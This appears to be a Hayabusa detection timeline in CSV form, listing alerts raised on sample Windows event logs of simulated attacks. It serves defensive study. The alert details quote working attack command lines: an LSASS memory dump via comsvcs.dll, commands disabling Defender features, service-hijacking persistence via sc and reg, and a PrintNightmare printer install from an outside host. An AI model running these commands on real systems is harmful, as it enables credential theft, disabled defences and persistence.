2021-08-23 04:33:52.344 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:52.350 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\vcruntime140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=344B09330D8CC196728BC4320194FE49993D3A2C,MD5=B3FF2F3D0040F23F36E9F2A3444F42EA,SHA256=3A8DAE539BB91C950CCD6EA244D5C09CDF44AEBC8EE4FF9C5094D5195F40E82A,IMPHASH=44C3854843F7A3FCCDF8DDBBEA66F302",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:52.355 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\msvcp140.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=6648A614B14F15ECB522A6D2BDF5E5031417742F,MD5=5BEB853A59982A96052364AB7BDE8D20,SHA256=CEACFE080276ACDF3FF731A8CA68140BCF589CEB1E3DD7544E0D4765E0489D9E,IMPHASH=4F1912F58F8D1AE7998EF5303198D62D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:52.513 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\OneDriveTelemetryStable.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=8D3D5F03E129C08F890847F7B12E620F9315B396,MD5=B01D2385E32F4251399C7EDCE8364967,SHA256=5E6CC575BEC320E4502B48B1050FE255BF6504013FAA6EE62A80707E3092383E,IMPHASH=C719A37B3234505BC0AADBB7DE7C9654",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:52.545 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileSyncTelemetryExtensions.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=B535176F0E42CE3DEE9F650070AB1CAEA840CFBF,MD5=68E4FB636BC56B74BF54F18223238862,SHA256=1084C4AF96A06F8A84CA279C659394ACB1BC80D1F5DBC16EB62964C5632C41A0,IMPHASH=D207E97F105829D9C63E79F98B136D2B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-08-23 04:33:52.931 +09:00,LAPTOP-JU4M3I0E,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuthLib64.dll | Process: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 15488 | PGUID: 00247C92-A6A0-6122-0000-00102F592002 | Hash: SHA1=FFFD189CF1234EC54392F57C8D6D683A92DEB2B4,MD5=5E3A74A8E0295B1396C1A5D5D5C0664F,SHA256=E0132392E8014B120BBF51F2E98E9BB329877666A7D005353A4E96DF14DFFD4C,IMPHASH=592278570E604A14992850A5B210142D",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx
2021-10-02 02:30:39.083 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: at 13:20 /interactive cmd | Path: C:\Windows\System32\at.exe | PID: 0x15cc | User: admmig | LID: 0x65b0f5db,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Interactive shell using AT schedule task.evtx
2021-10-06 18:46:09.533 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -EnableControlledFolderAccess Disabled"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x242c | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx
2021-10-06 18:46:13.168 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -PUAProtection disable"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x21f4 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx
2021-10-06 18:46:28.683 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1bcc | User: WIN10-02$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx
2021-10-07 23:52:54.848 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time"" /v FailureCommand /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x2a58 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx
2021-10-07 23:53:02.147 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc failure W32Time command= ""\""c:\Windows\system32\pentestlab.exe\"""" | Path: C:\Windows\System32\sc.exe | PID: 0xa00 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with Failure Command.evtx
2021-10-08 00:36:23.429 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc config xboxgip binPath= ""C:\windows\system32\pentestlab.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x29cc | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx
2021-10-08 00:36:24.892 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xboxgip"" /v ImagePath /t REG_SZ /d ""C:\tmp\pentestlab.exe"" | Path: C:\Windows\System32\reg.exe | PID: 0x11b8 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service abuse with malicious path.evtx
2021-10-08 17:53:42.131 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc sdset xboxgip ""D:(A;;CCLCSWRPWPDTLOCRRC;;;SY) | Path: C:\Windows\System32\sc.exe | PID: 0x1d28 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (sc).evtx
2021-10-08 19:05:29.432 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\XblGameSave\Security"" /v Security /t REG_BINARY /d fe340ead | Path: C:\Windows\System32\reg.exe | PID: 0x18c4 | User: admmig | LID: 0x5f72fee",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx
2021-10-08 19:05:36.298 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2af0 | User: WIN10-02$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Service permissions modified (registry).evtx
2021-10-08 21:56:58.803 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-08 21:57:04.504 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: admmig | Target User: gentilguest | IP Address: 20.188.56.147 | Process:  | Target Server: printnightmare.gentilkiwi.com,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-08 21:57:06.763 +09:00,fs01.offsec.lan,4648,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: rundll32 printui.dll,PrintUIEntry /in /n""\\printnightmare.gentilkiwi.com\Kiwi Legit Printer"" | Path: C:\Windows\System32\rundll32.exe | PID: 0x1670 | User: admmig | LID: 0x65b0f5db",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-08 21:57:06.869 +09:00,fs01.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-08 21:57:18.646 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-08 21:57:19.072 +09:00,fs01.offsec.lan,6416,critical,LatMov | CredAccess,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID4688,6416,4648-SystemNightMare.evtx"
2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx
2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx
2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,low,Persis,Local User Account Created,User: toto3 | SID: S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx
2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx
2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx
2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,medium,,File Created_Sysmon Alert,T1003 | Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 512 | PGUID: 7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx
2021-10-20 18:18:07.101 +09:00,FS03.offsec.lan,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,rules/sigma/file_event/file_event_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx
2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,info,,Logon Type 9 - NewCredentials,User: admmig | Computer: - | IP Addr: ::1 | LID: 0x266e045 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx
2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:43.326 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x269eec8 | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,CredAccess,PowerShell Get-Process LSASS,,rules/sigma/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.855 +09:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:55.871 +09:00,FS03.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\3e50931f5376ebab490b124f3f46dd45\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=BFDFC46117000B652897F1DE8084FBB9EAA66384,MD5=6EF679145F15A8E54FBF9B23A25A6F21,SHA256=240674945FF5175A14E5DF6DEB2AECD04231911DE9103CA34F6D327C4FF86732,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full | Process: C:\Windows\System32\rundll32.exe | User: OFFSEC\admmig | Parent Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | LID: 0x269eec8 | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Hash: SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\76nivOxA.dmp | Process: C:\Windows\System32\rundll32.exe | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,CredAccess,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx
